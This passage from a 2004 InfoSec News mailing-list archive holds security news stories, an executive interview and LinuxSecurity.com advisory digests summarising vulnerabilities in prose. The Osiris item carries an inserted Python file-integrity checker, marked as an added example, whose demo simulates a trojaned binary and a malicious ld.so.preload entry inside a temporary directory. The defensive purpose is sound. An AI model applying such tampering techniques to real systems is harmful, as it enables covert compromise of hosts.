freely in its entirety. Any and all copyrights appearing in list messages are maintained by their respective owners. 
From isn at c4i.org Mon Dec 6 04:28:00 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:34 2004 Subject: [ISN] Reformed Welsh hacker returns to computer crime Message-ID: http://www.pingwales.co.uk/security/welsh-hacker-returns.html By Robert Andrews 03 December 2004 The Welsh hacker whose escapades sparked panic about a potential World War III has returned to computer crime, planning a Hollywood-style heist to steal a valuable painting. But Mathew Bevan's latest electronic raid won't attract the long arm of the law - it's just an experiment staged for a television show due to be screened in December. Bevan won notoriety 10 years ago when he was arrested on suspicion of breaching and downloading data from US military computer networks in an effort to uncover evidence of a UFO conspiracy. Aged 21, he was charged with conspiracy after allegedly entering the secret Air Force Research Laboratory system in New York using a rudimentary PC in the back bedroom of his parents' Ely, Cardiff, bungalow. A British court later acquitted him after prosecutors abandoned their case and Bevan, whose hacker alias was "Kuji", renounced hacking to become a respected computer security consultant. He has now been enlisted to join a crack team of five reformed criminal masterminds set the challenge of using their underworld expertise to pull off high-profile thefts for The Heist, a three-part Channel 4 series starting Tuesday, December 7, at 9pm. In the show, the Welshman teams up with arch villains like armed robber Terry Smith, who once escaped from his jail term, and Joey Pyle, a former gangster and friend of the Krays. "Basically, a group of experts is brought together and set a task of performing a robbery under strict conditions, as real-life as possible," said Bevan, now 31, who studied computing at the University of Wales Institute, Cardiff, and is originally from the Llandaf area of the city. 
"Each episode covers a different robbery or task and, in each, I am the technology guru or hacker, monitoring and advising each step of the way. "No real criminals who intend to pull off these kinds of heists would actually employ hacker skills to get the job done. The only hacker skills used are my brains. "It's very similar to performing penetration exercises, only the top brass know what's going on, so essentially it is a real-life test of the organisation. There's nothing like a bit of James Bond!" But Bevan, who will appear on Richard & Judy ahead of the first episode, sets his own brush with the law apart from those of the ex-con colleagues on his team. "I never threatened or hurt anyone with my actions," he said. "Everything I did was on a computer screen from my bedroom; some of the other guys were a little more forceful with their actions. It becomes clear that I have a completely different way of looking at things than the others." "Victims" in each of the three shows approved the simulated attacks, welcoming the test of their own security. In the first episode, the team is given four days to steal a painting, The View From The Bandstand by UK artist Andrew Gifford, whilst on display during the London Art Fair at the Business Design Centre. Bevan is on board to scope out weaknesses in the electronic systems of a building regarded as impregnable. In subsequent shows, he uses his keyboard skills to attempt to smuggle a £1m car overseas and to kidnap a prize racehorse. "He's the only one of the ex-criminals in the series who hasn't been convicted," said a Channel 4 spokesperson. In his March 1994 hack - which has become part of internet folklore - Bevan, who is from the Ely area of the capital and has explained he turned to hacking at school to escape bullying, was also said to have mounted attacks on Nasa, Nato and Pentagon computers. 
Pursued by both Scotland Yard and the FBI, the case produced a hailstorm of hype from news media revelling in computer crime stories - normally the attention hackers crave, until they find themselves in the dock. Though reports claimed the Pentagon regarded Bevan as the number one threat to US security, many of the headlines focused on accomplice Richard Pryce's transfer of a database from a Korean nuclear laboratory computer to the New York machine, which sparked fears of an atomic spat between America and North Korea until it was discovered the lab had, in fact, been in South Korea. Pryce pleaded guilty and was fined £1,200. Following his acquittal at Woolwich Crown Court in November 1997, Bevan reformed and became a so-called "white hat" - a talented hacker who turns his skills to benevolent or commercial use like auditing security systems for a price. Operating under the name Kujimedia, he has since worked as a consultant for the likes of Nintendo and now lives in Wiltshire, from where he advises leading brands on design, viral marketing and online strategies. From isn at c4i.org Mon Dec 6 04:27:22 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:36 2004 Subject: [ISN] Q&A: ISS exec on security threat prevention Message-ID: http://www.computerworld.com/securitytopics/security/story/0,10801,98047,00.html By Jaikumar Vijayan DECEMBER 03, 2004 COMPUTERWORLD Security architectures that are designed solely to react to threats instead of preventing them in the first place are doomed to fail in a world of fast-evolving and self-propagating threats, says Tom Noonan, CEO of Atlanta-based Internet Security Systems Inc. What do you see as some of the big trends in the security market? This whole notion of reaction in terms of how our systems have been built is running out of steam. Preemption is going to be a very, very fundamental theme in the direction which security is taking. 
The concept of preemption basically addresses the question of why not avoid a threat or detect it and prevent it rather than react to it. If you look at the traditional security model, all of our technologies have been built as an ad hoc response to a new threat. Fifteen years ago, the only threat was floppy-transported viruses, so the solution was PC-based antivirus. When the threat became unauthorized access, we built firewalls; when it was spam, we built antispam; when it became spyware, we built antispyware tools; and when it is malicious content, we built content security tools. This entire industry has been built in an ad hoc, reactive manner. The technologies that lie underneath are all signature-based, and you cannot have a signature until you have an active threat. That was fine in a disconnected world. When you mention "signature-based technologies," are you referring specifically to antivirus tools? I'm talking about a signature that uniquely identifies a threat by name. Most intrusion-detection systems, most antivirus products, spam, spyware and content-security systems effectively work this way. So how does being preemptive help? Today, time and again, you see the devastating and pervasive impact of highly effective, self-propagating viruses and worms because the vast majority of businesses are dependent on multiple layers of reactive technology. Businesses are suffering daily from this reactive model. They have added every layer of protection they can, and they are still being compromised. The highly effective, self-propagating nature of Internet threats today forces companies into a reactive posture, and that is inefficient. The threat has scaled the control systems that are in place. When you talk about being more proactive, it's not only technology we are talking about, right? We are talking about technology and also about architecture. We are already seeing a pretty dramatic shift in security architectures on the Net. 
We are talking about management, which is very, very different in a preemptive world. We are talking about a dramatically different economic model in terms of the cost structure and clearly we are talking about different processes internally. What shift are you seeing in security architectures? A move away from point products toward platforms. The disaggregated, multiple layers are going away because the responsibility for making all that stuff work together has been thrust upon the unknowing IT department. The reality is that a whole bunch of acquired products marketed under the same brand, or the same bunch of products marketed under different brands, have never been built as a system or as a platform for security -- only as independent point capabilities to detect a threat. You also mentioned a shift in security economics. Since 2001, security budgets have been increasing on an average of 15% to 20% a year. That is totally unsustainable. No aspect of your cost structure can possibly sustain that kind of growth rate in a competitive global economic environment. CEOs and CFOs are forcing CIOs to be more efficient, not just with capital purchases but with the cost of labor itself. The economic shift in moving toward a platform is pretty significant. Platforms are built to be enterprisewide, meaning they are built and integrated to operate as one system from a vendor. What kind of products or services are you delivering to help your customers address these trends? If you look at our company, most people recognize us as the inventor of intrusion-detection systems and vulnerability-detection systems. From the start, the vision of this company was to build what we call the universal protection agent. We believed that threats would evolve, as would vulnerabilities, and they would continually change. Building any system that was threat-specific was fundamentally wrong to the long-term scale model. 
So this whole concept of preemption really began years ago with our vision of building a highly scalable enterprise system that could detect, analyze and prevent any kind of threats against vulnerable pieces of the infrastructure. Instead of focusing primarily on the threat, we are focusing on the vulnerabilities. Because we understand that vulnerability, we can protect against it. From isn at c4i.org Mon Dec 6 04:27:37 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:38 2004 Subject: [ISN] The Hidden Risks of Demo Discs Message-ID: http://www.eweek.com/article2/0,1759,1735655,00.asp By Libe Goad December 3, 2004 In mid-November, members of Sony's PlayStation Underground received the Holiday Demo Disk and discovered that after executing one of the game demos on the disc, their PS2 memory cards were completely erased. While that doesn't mean much to nongamers, anyone who has spent 40-plus hours building a character in a role-playing game or playing through a season of football - well, it's a huge boot in the trousers. The disc, sent via mail to PlayStation Underground members, was also set to be polybagged with several gaming magazines. The glitch was caught in time, so the bug didn't reach as many consumers as it might have. Ryan Bowling, public relations manager for Sony Computer Entertainment America, said Sony responded to the situation by sending out warning e-mails to PlayStation Underground subscribers telling them to remove their memory cards before playing the demo. "It is unfortunate that it happened," Bowling said, "and we're going to make sure it doesn't happen again." But what does this mean for the rest of us? There's more to the story than a handful of gamers losing their saved game files. The implications of such a glitch can be huge, especially as consumers start to set up networked computing systems in the home with routers, networks, servers, etc. Minus cubicles and a water cooler, it's the equivalent of a small enterprise network. 
Rick Fleming, chief technology officer at Digital Defense Inc, said that although most consumers don't realize it, game consoles are also like computers that run off of their own proprietary operating system. As a result, a bug in a demo CD, CD-ROM or DVD-ROM could affect the rest of a home network and has the potential to spread to an enterprise network through a VPN connection or other portable storage devices. "PlayStation and Xbox are being networked with home computers so I can easily see how something like that would spread across a network," Fleming said. "Every time you connect to something else, there's another opportunity for something to go wrong." Trouble Inside the Firewall The idea that a removable disk can affect an entire networked system seems almost quaint, reserved for corporate spoofs such as "Office Space" where the protagonists use a program on a 3.5-inch floppy disk to steal money from the company. Now, the companies and consumers focus on outside threats, with the illusion that they're sitting pretty behind Internet firewalls and anti-virus programs. "It's like they'll leave the windows and sliding glass doors open," Fleming said. "Not the front door, though. It's vaulted shut." While there are few recent instances of companies sending out software with embedded viruses, it still happens on occasion. In 2002, Microsoft sent out a .Net developer disk infected with the Nimda virus, though Microsoft says it didn't actually spread to any machines. In the entertainment sector, AOL Time-Warner released a "Powerpuff Girls" DVD in 2001 that contained the peevish "FunLove" virus, which spread to users who played the disc on PC. In an earlier echo of the PlayStation Underground incident, MacAddict Magazine sent out a demo with a version of the Auto-Start virus. In most of these cases, the problems were easily fixed, but it is still a signifier that seemingly innocent CDs sent out by reputable companies can contain malicious content. 
With the CD drives in virtually every machine, it's more common than ever for people to share information via optical media, Fleming said. Most people don't give a second thought to putting something like that in their machine. So, are these little glitches as banal as reports make them out to be? Maybe -- though more conspiratorial analysts say these harmless bugs could turn into an entirely new threat that the security community is not ready to handle. "Most of the time when we see threats show up, it's a concept for how a Trojan or virus can be introduced," Fleming said. "When it's introduced, it's mostly very benign -- erasing the flash memory on a PlayStation is not going to affect me personally -- but what does concern me is that we have a whole new threat vector. People are going to take the concept and think, 'What's the next thing I can do?'" An Ounce of Prevention Not every security expert takes the same point of view, but they all agree that any networked user needs to take the same precautions, whether they're on a home or business network. John Pescatore, vice president of Internet Security at Gartner Inc., said home network security has a long way to go, since most major companies involved in home computing don't focus on that kind of security environment. "There's a funny thing going on," he said. "For many years, Microsoft built Windows with home users in mind, but in 2001-2002, they got religion and started doing more for enterprise security. They forgot about the home user who doesn't have an IT staff to take care of their problems." Pescatore also said there's been discussion in the industry about how to integrate security into consumer electronics. The problem is that companies still say anything harder to use slows down consumer adoption -- so no one is willing to make security a priority in a consumer environment. "There's not a lot of incentive to say, 'My product is harder to use,'" Pescatore said. 
AOL has recently taken one of the first steps into helping consumers with security by offering McAfee VirusScan Online services for free. Businesses also can take a few notes from a home network invasion. Much like home users, Fleming said businesses keep a closer watch on outside threats and don't do enough to make sure that nothing is coming from within the company. "Computer institutions and the FBI have surveys that show around 60 percent of all security instances occur internally," Fleming said. "This is where a lot of companies don't get it. They do all of the testing on outside resources and don't monitor internally." Fleming strongly recommended that businesses create a strong security policy that's enforced through monitoring and training. People need to be aware of bringing in software and other devices from home. That includes things such as music CDs, which often store data other than the actual music tracks. "There has to be mandated vigilance in the enterprises," Fleming said. "It's got to be pounded into their heads to be careful." From isn at c4i.org Mon Dec 6 04:27:04 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:39 2004 Subject: [ISN] Linux Advisory Watch - December 3rd 2004 Message-ID: +---------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | December 3rd, 2004 Volume 5, Number 48a | +---------------------------------------------------------------------+ Editors: Dave Wreski Benjamin D. Thomas dave@linuxsecurity.com ben@linuxsecurity.com Linux Advisory Watch is a comprehensive newsletter that outlines the security vulnerabilities that have been announced throughout the week. It includes pointers to updated packages and descriptions of each vulnerability. 
This week advisories were released for java, abiworld, cyrus, squirrelmail, libgd1, openssl, hpsockd, policycoreutils, prelink, libselinux, udev, tcpdump, samba, gaim, FreeBSD kernel, phpMyAdmin, libxpm4, kde, amavisd, open motif, linux kernel, and cyrus-imapd. The distributors include Conectiva, Debian, Fedora, Gentoo, Mandrake, Trustix, Red Hat, and SuSE. ----- Open Letter to Linux Security Community Welcome to the new LinuxSecurity.com! I must admit, I am really proud of what we have been able to accomplish over the years. LinuxSecurity.com has grown from a small idea that a couple of security geeks had in 1999, to a major and well respected Linux resource. With an all new look & feel, organizational changes, security events, and additions to our staff, we hope to better serve the Linux and open source community. Although there are many aesthetic improvements, a major part of our development has focused on creating a content structure and backend system that is easy to update. Since the beginning, we have been able to maintain one of the largest, if not the largest and most comprehensive Linux advisory archive on the Internet. Through the years, we have scoured the net for thousands of hours to bring fresh and relevant articles, papers, and resources to you. It wasn't easy in the beginning. We had to create the site from scratch and build a community-wide reputation. The site was started in 1999, the middle of the dot-com boom. Dave Wreski, a Linux security expert and the original founder of LinuxSecurity.com had great foresight. He envisioned the widespread use of Linux as well as many other open source tools. Rather than companies spending thousands of dollars on proprietary tools, he saw a world where open source would be respected and adopted because of its flexibility and greater security through open standards and full disclosure... 
Read Full Text: http://www.linuxsecurity.com/content/view/117288/49/ ----- Mass deploying Osiris Osiris is a centralized file-integrity program that uses a client/server architecture to check for changes on a system. A central server maintains the file-integrity database and configuration for a client and at a specified time, sends the configuration file over to the client, runs a scan and sends the results back to the server to compare any changes. Those changes are then sent via email, if configured, to a system admin or group of people. The communication is all done over an encrypted communication channel. http://www.linuxsecurity.com/content/view/101883/49/ --------------------------------------------------------------------- AIDE and CHKROOTKIT Network security is continuing to be a big problem for companies and home users. The problem can be resolved with an accurate security analysis. In this article I show how to approach security using aide and chkrootkit. http://www.linuxsecurity.com/content/view/101882/49/ ------ --> Take advantage of the LinuxSecurity.com Quick Reference Card! --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf +---------------------------------+ | Distribution: Conectiva | ----------------------------// +---------------------------------+ * Conectiva: java plugin vulnerability 26th, November, 2004 Jouko Pynnonen reported[2], through iDEFENSE, a vulnerability[3] in the plugin mechanism which allows remote attackers to bypass the Java sandbox through the use of javascript. http://www.linuxsecurity.com/content/view/106930 * Conectiva: abiword buffer overflow vulnerability fix 1st, December, 2004 iDefense[3] discovered[4] a buffer overflow vulnerability[5] in the wv library which could allow an attacker to execute arbitrary code with the privileges of the user running the vulnerable application. 
http://www.linuxsecurity.com/content/view/117319 * Conectiva: cyrus-imapd Multiple vulnerabilities 1st, December, 2004 Stefan Esser from e-matters security recently published[2] several vulnerabilities in cyrus-imapd. http://www.linuxsecurity.com/content/view/117320 * Conectiva: squirrelmail cross site scripting vulnerability fix 2nd, December, 2004 Joost Pol noticed[2] that SquirrelMail is prone to a cross site scripting issue in the decoding of encoded text in certain headers. SquirrelMail correctly decodes the specially crafted header, but doesn't sanitize the result. http://www.linuxsecurity.com/content/view/117321 +---------------------------------+ | Distribution: Debian | ----------------------------// +---------------------------------+ * Debian: libgd1 arbitrary code execution fix 29th, November, 2004 More potential integer overflows have been found in the GD graphics library which weren't covered by our security advisory DSA 589. They could be exploited by a specially crafted graphic and could lead to the execution of arbitrary code on the victim's machine. http://www.linuxsecurity.com/content/view/106931 * Debian: libgd2 arbitrary code execution fix 29th, November, 2004 More potential integer overflows have been found in the GD graphics library which weren't covered by our security advisory DSA 589. They could be exploited by a specially crafted graphic and could lead to the execution of arbitrary code on the victim's machine. http://www.linuxsecurity.com/content/view/106932 * Debian: openssl insecure temporary file creation fix 1st, December, 2004 Trustix developers discovered insecure temporary file creation in a supplemental script (der_chop) of the openssl package which may allow local users to overwrite files via a symlink attack. http://www.linuxsecurity.com/content/view/117312 * Debian: hpsockd denial of service fix 3rd, December, 2004 "infamous41md" discovered a buffer overflow condition in hpsockd, the socks server written at Hewlett-Packard. 
An exploit could cause the program to crash or may have a worse effect. http://www.linuxsecurity.com/content/view/117313 +---------------------------------+ | Distribution: Fedora | ----------------------------// +---------------------------------+ * Fedora: policycoreutils-1.18.1-2 update Resend with correct id 30th, November, 2004 FixFiles.cron is not needed for targeted policy and needs to be reworked for strict policy. Removing it prevents possible relabeling problems. http://www.linuxsecurity.com/content/view/106953 * Fedora: policycoreutils-1.18.1-2 update 30th, November, 2004 FixFiles.cron is not needed for targeted policy and needs to be reworked for strict policy. Removing it prevents possible relabeling problems. http://www.linuxsecurity.com/content/view/106952 * Fedora: prelink-0.3.3-0.fc3 update 30th, November, 2004 If layout code needs to re-prelink some library, make sure all libraries that depend on it are re-prelinked too (#140081) http://www.linuxsecurity.com/content/view/106950 * Fedora: libselinux-1.19.1-8 update 30th, November, 2004 Change location of helper applications and remove some debug applications that should not have been part of the distribution. http://www.linuxsecurity.com/content/view/106951 * Fedora: udev-039-10.FC3.2 update 30th, November, 2004 Forgot to turn off debugging logging. This release speeds up udev.
http://www.linuxsecurity.com/content/view/106948 * Fedora: tcpdump-3.8.2-6.FC2.1 update 30th, November, 2004 fixed nfs protocol parsing for 64 bit architectures (bug 132781) http://www.linuxsecurity.com/content/view/106949 * Fedora: abiword-2.0.12-7.fc3 update 30th, November, 2004 Fixes for tempnam usages and startup geometry crashes http://www.linuxsecurity.com/content/view/106947 * Fedora: system-config-securitylevel-1.4.18-2 update 29th, November, 2004 This fixes tracebacks introduced by the libselinux update (#139155) http://www.linuxsecurity.com/content/view/106944 * Fedora: samba-3.0.9-1.fc2 update 29th, November, 2004 This update closes two security holes: CAN-2004-0882 and CAN-2004-0930 http://www.linuxsecurity.com/content/view/106941 * Fedora: samba-3.0.9-1.fc3 update 29th, November, 2004 This update closes two security holes: CAN-2004-0882 and CAN-2004-0930. http://www.linuxsecurity.com/content/view/106942 * Fedora: gaim-1.0.2-0.FC2 update 29th, November, 2004 FC2 Update http://www.linuxsecurity.com/content/view/106943 * Fedora: squirrelmail-1.4.3a-6.FC2 update 28th, November, 2004 CAN-2004-1036 Cross Site Scripting in encoded text http://www.linuxsecurity.com/content/view/106934 * Fedora: squirrelmail-1.4.3a-6.FC3 update 28th, November, 2004 CAN-2004-1036 Cross Site Scripting in encoded text http://www.linuxsecurity.com/content/view/106935 * Fedora: spamassassin-3.0.1-0.FC3 update 28th, November, 2004 Several important bug fixes in upstream release. 
http://www.linuxsecurity.com/content/view/106936 * Fedora: system-config-date-1.7.13-0.fc3.1 update 29th, November, 2004 enable Gujarati and Tamil translations (#140881) http://www.linuxsecurity.com/content/view/106937 +---------------------------------+ | Distribution: FreeBSD | ----------------------------// +---------------------------------+ * FreeBSD: Kernel memory disclosure in procfs and linprocfs 2nd, December, 2004 The implementation of the /proc/curproc/cmdline pseudofile in the procfs(5) file system on FreeBSD 4.x and 5.x, and of the /proc/self/cmdline pseudofile in the linprocfs(5) file system on FreeBSD 5.x reads a process' argument vector from the process address space. During this operation, a pointer was dereferenced directly without the necessary validation steps being performed. http://www.linuxsecurity.com/content/view/117318 +---------------------------------+ | Distribution: Gentoo | ----------------------------// +---------------------------------+ * Gentoo: Sun and Blackdown Java Applet privilege escalation 29th, November, 2004 The Java plug-in security in Sun and Blackdown Java environments can be bypassed to access arbitrary packages, allowing untrusted Java applets to perform unrestricted actions on the host system. http://www.linuxsecurity.com/content/view/106945 * Gentoo: Open DC Hub Remote code execution 28th, November, 2004 Open DC Hub contains a buffer overflow that can be exploited to allow remote code execution. http://www.linuxsecurity.com/content/view/106940 * Gentoo: phpWebSite HTTP response splitting vulnerability 26th, November, 2004 phpWebSite is vulnerable to possible HTTP response splitting attacks. http://www.linuxsecurity.com/content/view/106929 * Gentoo: phpMyAdmin Multiple XSS vulnerabilities 27th, November, 2004 phpMyAdmin is vulnerable to cross-site scripting attacks. 
http://www.linuxsecurity.com/content/view/106939 +---------------------------------+ | Distribution: Mandrake | ----------------------------// +---------------------------------+ * Mandrake: libxpm4 correct issues with previous update 30th, November, 2004 The previous libxpm4 update had a linking error that resulted in a missing s_popen symbol error running applications dependent on the library. In addition, the file path checking in the security updates prevented some applications, like gimp-2.0, from being able to save xpm format images. http://www.linuxsecurity.com/content/view/106946 * Mandrake: kdepim various bugs fix 27th, November, 2004 A number of bugs in kdepim are fixed with this update. http://www.linuxsecurity.com/content/view/106938 * Mandrake: kdelibs various bugs fix 26th, November, 2004 A number of bugs in kdelibs are fixed with this update. http://www.linuxsecurity.com/content/view/106925 * Mandrake: kdebase various bugs fixes 26th, November, 2004 A number of bugs in kdebase are fixed with this update. http://www.linuxsecurity.com/content/view/106924 +---------------------------------+ | Distribution: Trustix | ----------------------------// +---------------------------------+ * Trustix: amavisd-new, anaconda, courier-imap, cyrus-imapd, cyrus-sasl, file, kernel, mkbootdisk, mys 29th, November, 2004 Fix amavis user creation on install. Support kickstart files on FTP. Hyperthreading detection. http://www.linuxsecurity.com/content/view/106933 +---------------------------------+ | Distribution: Red Hat | ----------------------------// +---------------------------------+ * Red Hat: openmotif image vulnerability fix 2nd, December, 2004 Updated openmotif packages that fix flaws in the Xpm image library are now available. http://www.linuxsecurity.com/content/view/117314 * Red Hat: kernel security vulnerabilities fix 2nd, December, 2004 Updated kernel packages that fix several security issues in Red Hat Enterprise Linux 3 are now available.
http://www.linuxsecurity.com/content/view/117315 +---------------------------------+ | Distribution: SuSE | ----------------------------// +---------------------------------+ * SuSE: various kernel problems 1st, December, 2004 Several security problems have been found and addressed by the SUSE Security Team. The following issues are present in all SUSE Linux based products. http://www.linuxsecurity.com/content/view/117316 * SuSE: cyrus-imapd remote command execution 3rd, December, 2004 Stefan Esser reported various bugs within the Cyrus IMAP Server. These include buffer overflows and out-of-bounds memory access which could allow remote attackers to execute arbitrary commands as root. The bugs occur in the pre-authentication phase, therefore an update is strongly recommended. http://www.linuxsecurity.com/content/view/117317 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From isn at c4i.org Tue Dec 7 03:24:41 2004 From: isn at c4i.org (InfoSec News) Date: Tue Dec 7 03:37:02 2004 Subject: [ISN] Linux Security Week - December 6th 2004 Message-ID: +---------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | December 6th, 2004 Volume 5, Number 48n | | | | Editorial Team: Dave Wreski dave@linuxsecurity.com | | Benjamin D. Thomas ben@linuxsecurity.com | +---------------------------------------------------------------------+ Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines.
This week, perhaps the most interesting articles include Anti-Hacker Tool Kit 2/e, A Secure Network Needs Informed Workers, Network Forensic Tools, and Transcript of the LinuxSecurity.com Launch Chat. --- >> The Perfect Productivity Tools << WebMail, Groupware and LDAP Integration provide organizations with the ability to securely access corporate email from any computer, collaborate with co-workers and set up comprehensive addressbooks to consistently keep employees organized and connected. http://ads.linuxsecurity.com/cgi-bin/newad_redirect.pl?id=gdn05 --- LINUX ADVISORY WATCH This week advisories were released for java, abiword, cyrus, squirrelmail, libgd1, openssl, hpsockd, policycoreutils, prelink, libselinux, udev, tcpdump, samba, gaim, FreeBSD kernel, phpMyAdmin, libxpm4, kde, amavisd, openmotif, linux kernel, and cyrus-imapd. The distributors include Conectiva, Debian, Fedora, Gentoo, Mandrake, Trustix, Red Hat, and SuSE. http://www.linuxsecurity.com/content/view/117327/150/ ----- Open Letter to the Linux Security Community With an all new look & feel, organizational changes, security events, and additions to our staff, we hope to better serve the Linux and open source community. Although there are many aesthetic improvements, a major part of our development has focused on creating a content structure and backend system that is easy to update. http://www.linuxsecurity.com/content/view/117288/49/ ----- Mass deploying Osiris Osiris is a centralized file-integrity program that uses a client/server architecture to check for changes on a system. A central server maintains the file-integrity database and configuration for a client and, at a specified time, sends the configuration file over to the client, runs a scan and sends the results back to the server to compare for any changes. Those changes are then sent via email, if configured, to a system admin or group of people. The communication is all done over an encrypted communication channel.
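The Osiris blurb above (the same text appears in the Advisory Watch issue earlier on this page) describes the loop every host-based integrity checker runs: build a baseline of file hashes and metadata, rescan later, diff, and mail the differences. The following Python is an added example of that loop; it is not Osiris code and not from LinuxSecurity.com. The sample tree and the tampering it simulates are constructed inline. Osiris keeps the baseline on the central server precisely so an intruder on the scanned host cannot rewrite it; the example mimics that by serializing the baseline to canonical JSON and loading it back rather than keeping the in-memory dictionary.

```python
"""Host-based file-integrity check in the Osiris/AIDE style (added example).

Baseline a directory tree (content hash + permission bits + owner + size),
rescan it later, and report what was added, removed or modified.
"""
import hashlib
import json
import os
import shutil
import stat
import tempfile


def sha256_of(path):
    """Stream a file through SHA-256 so large files need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan(root):
    """Return {relative_path: attributes} for regular files and symlinks under root.
    lstat() is used so a symlink is recorded as a link (with its target) rather
    than hashed through; os.walk does not descend into symlinked directories."""
    db = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic traversal order
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            entry = {"mode": stat.S_IMODE(st.st_mode),  # permission bits only
                     "uid": st.st_uid, "gid": st.st_gid, "size": st.st_size}
            if stat.S_ISLNK(st.st_mode):
                entry["target"] = os.readlink(full)
            elif stat.S_ISREG(st.st_mode):
                entry["sha256"] = sha256_of(full)
            else:
                continue  # fifos, sockets, device nodes: out of scope here
            db[os.path.relpath(full, root)] = entry
    return db


def compare(baseline, current):
    """Diff two scans; 'modified' maps a path to the attributes that changed."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = {}
    for path in sorted(set(baseline) & set(current)):
        old, new = baseline[path], current[path]
        changed = sorted(k for k in set(old) | set(new) if old.get(k) != new.get(k))
        if changed:
            modified[path] = changed
    return {"added": added, "removed": removed, "modified": modified}


def serialize(db):
    """Canonical JSON, the form in which the baseline is stored off-host."""
    return json.dumps(db, sort_keys=True, indent=1)


def format_report(report):
    """Plain-text summary, the kind of thing an integrity checker mails out."""
    lines = [f"+ added     {p}" for p in report["added"]]
    lines += [f"- removed   {p}" for p in report["removed"]]
    lines += [f"! modified  {p} ({', '.join(a)})" for p, a in report["modified"].items()]
    return "\n".join(lines) if lines else "no changes"


def _write(path, data, mode=None):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)
    if mode is not None:
        os.chmod(path, mode)


def demo():
    """Constructed scenario: baseline a small fake root, tamper with it, rescan."""
    root = tempfile.mkdtemp(prefix="fim-")
    try:
        _write(os.path.join(root, "etc", "passwd"), b"root:x:0:0::/root:/bin/sh\n", 0o644)
        _write(os.path.join(root, "etc", "motd"), b"welcome\n", 0o644)
        _write(os.path.join(root, "bin", "ls"), b"\x7fELF original binary\n", 0o755)
        baseline = json.loads(serialize(scan(root)))  # stored on the server, loaded back
        # Tampering: same-size binary replacement (size alone would miss it),
        # loosened permissions, a removed file and a new preload file.
        _write(os.path.join(root, "bin", "ls"), b"\x7fELF trojaned binary\n")
        os.chmod(os.path.join(root, "etc", "passwd"), 0o666)
        os.remove(os.path.join(root, "etc", "motd"))
        _write(os.path.join(root, "etc", "ld.so.preload"), b"/tmp/evil.so\n", 0o644)
        return compare(baseline, scan(root))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(format_report(demo()))
```

The trojaned binary is the same size as the original, so only the hash flags it; that is why a checker must hash content rather than trust size and timestamps, which an intruder can set freely. Run as a scheduled job, the equivalent of Osiris's server-side comparison is simply `compare(stored_baseline, scan("/"))` with the baseline read from somewhere the scanned host cannot write.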
http://www.linuxsecurity.com/content/view/101884/49/ ----- --> Take advantage of the LinuxSecurity.com Quick Reference Card! --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf +---------------------+ | Host Security News: | <<-----[ Articles This Week ]---------- +---------------------+ * Anti-Hacker Tool Kit 2/e 2nd, December, 2004 In everyday life people do all sorts of things with all sorts of tools. But, do they get it right? Every tool has to be used in a certain manner, and if one doesn't know how to use it, the result can be damage. It's the same with computer and network security tools. Before you can select the right tools for the job, you have to know what tools are available and learn how to use them. http://www.linuxsecurity.com/content/view/117307 * Unprotected PCs can be hijacked in minutes 30th, November, 2004 Simply connecting to the Internet -- and doing nothing else -- exposes your PC to non-stop, automated break-in attempts by intruders looking to take control of your machine surreptitiously. http://www.linuxsecurity.com/content/view/116796 * Network Forensic Tools 3rd, December, 2004 Stage 1: Network-capable initial analysis products for first responders, such as Guidance's EnCase Enterprise Edition and Technology Pathway's ProDiscover. These two products can acquire drive images remotely in a live environment, and their use eliminates the need for the Stage 2 tools. http://www.linuxsecurity.com/content/view/117361 * Hacking tool reportedly draws FBI subpoenas 1st, December, 2004 The author of the popular freeware hacking tool Nmap warned users this week that FBI agents are increasingly seeking access to information from the server logs of his download site, insecure.org.
http://www.linuxsecurity.com/content/view/117282 +------------------------+ | Network Security News: | +------------------------+ * AirTight Networks announced first Wi-Fi Firewall 1st, December, 2004 AirTight Networks, formerly Wibhu Technologies, announced on Tuesday the availability of SpectraGuard 2.0, the first Wi-Fi firewall to protect enterprise networks from wireless security threats. http://www.linuxsecurity.com/content/view/117287 * Bad, Bad Bots 1st, December, 2004 Automated attacks are coming from unexpected quarters--from across the globe, across town, and most creepily, even from across the hall. According to a recent report from anti-virus vendor Symantec, this year's 450 percent increase in the number of attacks on Windows machines is evidence that automation is proving as efficient for 21st-Century hackers as it did for 20th-Century manufacturers. http://www.linuxsecurity.com/content/view/117295 * Linux Netwosix 1.2 Jinko is released 28th, November, 2004 I'm ready to announce that Linux Netwosix 1.2 is ready. I have completely rebuilt, upgraded and secured the system. Please, read the Announcement Release. It is based on the powerful and reliable Kernel 2.6.9 and has been created for the requirements of every SysAdmin. Nepote contains the updated packages. You can download Netwosix from our Download Center or from one of our mirrors. Thank you! http://www.linuxsecurity.com/content/view/116794 +------------------------+ | General Security News: | +------------------------+ * User knowledge key to good security 1st, December, 2004 Given the continual drive to secure today's enterprises, and in light of National Computer Security Day celebrated this week, Security Pipeline tapped Kathleen M. Coe, Symantec Corp.'s regional education director of education services, for insight on how to foster better user security behavior, as well as how to seed the strong corporate security culture companies require today.
